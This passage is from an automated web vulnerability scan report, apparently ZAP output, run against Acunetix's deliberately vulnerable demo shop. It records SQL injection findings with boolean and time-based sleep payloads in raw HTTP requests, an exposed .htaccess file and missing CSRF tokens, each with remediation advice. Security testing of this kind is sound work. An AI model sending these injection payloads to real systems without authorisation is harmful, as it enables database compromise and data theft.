Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=8-2 |
Method | GET |
Parameter | pic |
Attack | 8-2 |
Evidence | |
Request Header - size: 293 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=8-2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=2 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:28:19 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6454 |
Response Body - size: 6,454 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Thing</h2><div class='story'><p><a href='showimage.php?file=./pictures/6.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/6.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><h3>Long description</h3><p><p> This picture is an 99 cm x 200 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $10000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='10000'><input type='hidden' name='addcart' value='6'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/secured/newuser.php |
Method | POST |
Parameter | uuname |
Attack | akpnUdBu' OR '1'='1' -- |
Evidence | |
Request Header - size: 521 bytes. |
POST http://testphp.vulnweb.com/secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 152 Origin: http://testphp.vulnweb.com Connection: keep-alive Referer: http://testphp.vulnweb.com/signup.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 152 bytes. |
uuname=akpnUdBu%27+AND+%271%27%3D%271%27+--+&upass=&upass2=&urname=DsYmcvRO&ucc=VVsNLaLW&uemail=RgLhBYOF&uphone=vkKtDSbY&uaddress=txqpnMEp&signup=signup
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:26:52 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 780 |
Response Body - size: 780 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title>add new user</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <div id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> </div> <div id="content"> <p>You have been introduced to our database with the above informations:</p><ul><li>Username: akpnUdBu' AND '1'='1' -- </li><li>Password: </li><li>Name: DsYmcvRO</li><li>Address: txqpnMEp</li><li>E-Mail: RgLhBYOF</li><li>Phone number: vkKtDSbY</li><li>Credit card: VVsNLaLW</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div> </body> </html> |
URL | http://testphp.vulnweb.com/userinfo.php |
Method | POST |
Parameter | pass |
Attack | ZAP' OR '1'='1' -- |
Evidence | |
Request Header - size: 343 bytes. |
POST http://testphp.vulnweb.com/userinfo.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com/login.php Content-Length: 47 |
Request Body - size: 47 bytes. |
uname=ZAP&pass=ZAP%27+AND+%271%27%3D%271%27+--+
|
Response Header - size: 244 bytes. |
HTTP/1.1 302 Found
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:27:23 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Location: login.php Content-Length: 14 |
Response Body - size: 14 bytes. |
you must login
|
URL | http://testphp.vulnweb.com/userinfo.php |
Method | POST |
Parameter | uname |
Attack | ZAP' OR '1'='1' -- |
Evidence | |
Request Header - size: 343 bytes. |
POST http://testphp.vulnweb.com/userinfo.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com/login.php Content-Length: 47 |
Request Body - size: 47 bytes. |
uname=ZAP%27+AND+%271%27%3D%271%27+--+&pass=ZAP
|
Response Header - size: 244 bytes. |
HTTP/1.1 302 Found
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:27:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Location: login.php Content-Length: 14 |
Response Body - size: 14 bytes. |
you must login
|
Instances | 9 |
Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
Tags |
OWASP_2021_A03
WSTG-v42-INPV-05 OWASP_2017_A01 |
CWE Id | 89 |
WASC Id | 19 |
Plugin Id | 40018 |
High |
SQL Injection - MySQL |
---|---|
Description |
SQL injection may be possible
|
URL | http://testphp.vulnweb.com/AJAX/infoartist.php?id=3 |
Method | GET |
Parameter | id |
Attack | 3 / sleep(15) |
Evidence | |
Request Header - size: 330 bytes. |
GET http://testphp.vulnweb.com/AJAX/infoartist.php?id=3+%2F+sleep%2815%29+ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/AJAX/index.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/AJAX/infocateg.php?id=4 |
Method | GET |
Parameter | id |
Attack | 4 / sleep(15) |
Evidence | |
Request Header - size: 329 bytes. |
GET http://testphp.vulnweb.com/AJAX/infocateg.php?id=4+%2F+sleep%2815%29+ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/AJAX/index.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/artists.php?artist=3 |
Method | GET |
Parameter | artist |
Attack | 3 / sleep(15) |
Evidence | |
Request Header - size: 302 bytes. |
GET http://testphp.vulnweb.com/artists.php?artist=3+%2F+sleep%2815%29+ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:30:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4942 |
Response Body - size: 4,942 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> Warning: mysql_query(): Unable to save result set in /hj/var/www/artists.php on line 61 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62 </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=6 |
Method | GET |
Parameter | pic |
Attack | 6 / sleep(15) |
Evidence | |
Request Header - size: 310 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=6+%2F+sleep%2815%29+ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=2 |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/userinfo.php |
Method | POST |
Parameter | uname |
Attack | ZAP' / sleep(15) / ' |
Evidence | |
Request Header - size: 343 bytes. |
POST http://testphp.vulnweb.com/userinfo.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com/login.php Content-Length: 47 |
Request Body - size: 47 bytes. |
uname=ZAP%27+%2F+sleep%2815%29+%2F+%27&pass=ZAP
|
Response Header - size: 244 bytes. |
HTTP/1.1 302 Found
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:29:21 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Location: login.php Content-Length: 14 |
Response Body - size: 14 bytes. |
you must login
|
Instances | 5 |
Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
Tags |
OWASP_2021_A03
WSTG-v42-INPV-05 OWASP_2017_A01 |
CWE Id | 89 |
WASC Id | 19 |
Plugin Id | 40019 |
Medium |
.htaccess Information Leak |
---|---|
Description |
htaccess files can be used to alter the configuration of the Apache Web Server software to enable/disable additional functionality and features that the Apache Web Server software has to offer.
|
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccess |
Method | GET |
Parameter | |
Attack | |
Evidence | HTTP/1.1 200 OK |
Request Header - size: 277 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccess HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 252 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:44:12 GMT Content-Type: application/octet-stream Content-Length: 176 Last-Modified: Wed, 15 Feb 2012 10:32:40 GMT Connection: keep-alive ETag: "4f3b89c8-b0" Accept-Ranges: bytes |
Response Body - size: 176 bytes. |
RewriteEngine on
RewriteRule Details/.*/(.*?)/ details.php?id=$1 [L] RewriteRule BuyProduct-(.*?)/ buy.php?id=$1 [L] RewriteRule RateProduct-(.*?)\.html rate.php?id=$1 [L] |
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/.htaccess |
Method | GET |
Parameter | |
Attack | |
Evidence | HTTP/1.1 200 OK |
Request Header - size: 319 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/.htaccess HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:44:13 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 313 |
Response Body - size: 313 bytes. |
<div><img src='/Mod_Rewrite_Shop/images/3.jpg'><b>Laser Color Printer HP LaserJet M551dn, A4</b><br><br>Laser Color Printer HP LaserJet M551dn, A4<br><a href='/Mod_Rewrite_Shop/BuyProduct-3/'>Buy</a> <a href='/Mod_Rewrite_Shop/RateProduct-3.html'>Rate</a></div><hr><a href='/Mod_Rewrite_Shop/'>Back</a>
|
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/.htaccess |
Method | GET |
Parameter | |
Attack | |
Evidence | HTTP/1.1 200 OK |
Request Header - size: 336 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/.htaccess HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:44:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 319 |
Response Body - size: 319 bytes. |
<div><img src='/Mod_Rewrite_Shop/images/1.jpg'><b>Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br>NET STORAGE ENCLOSURE SATA DNS-313 D-LINK<br><a href='/Mod_Rewrite_Shop/BuyProduct-1/'>Buy</a> <a href='/Mod_Rewrite_Shop/RateProduct-1.html'>Rate</a></div><hr><a href='/Mod_Rewrite_Shop/'>Back</a>
|
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/.htaccess |
Method | GET |
Parameter | |
Attack | |
Evidence | HTTP/1.1 200 OK |
Request Header - size: 323 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/.htaccess HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:44:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 279 |
Response Body - size: 279 bytes. |
<div><img src='/Mod_Rewrite_Shop/images/2.jpg'><b>Web Camera A4Tech PK-335E</b><br><br>Web Camera A4Tech PK-335E<br><a href='/Mod_Rewrite_Shop/BuyProduct-2/'>Buy</a> <a href='/Mod_Rewrite_Shop/RateProduct-2.html'>Rate</a></div><hr><a href='/Mod_Rewrite_Shop/'>Back</a>
|
Instances | 4 |
Solution |
Ensure the .htaccess file is not accessible.
|
Reference | http://www.htaccess-guide.com/ |
Tags |
OWASP_2021_A05
WSTG-v42-CONF-05 OWASP_2017_A06 |
CWE Id | 94 |
WASC Id | 14 |
Plugin Id | 40032 |
Medium |
Absence of Anti-CSRF Tokens |
---|---|
Description |
No Anti-CSRF tokens were found in a HTML submission form.
A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.
CSRF attacks are effective in a number of situations, including:
* The victim has an active session on the target site.
* The victim is authenticated via HTTP auth on the target site.
* The victim is on the same local network as the target site.
CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.
|
URL | http://testphp.vulnweb.com |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 213 bytes. |
GET http://testphp.vulnweb.com HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
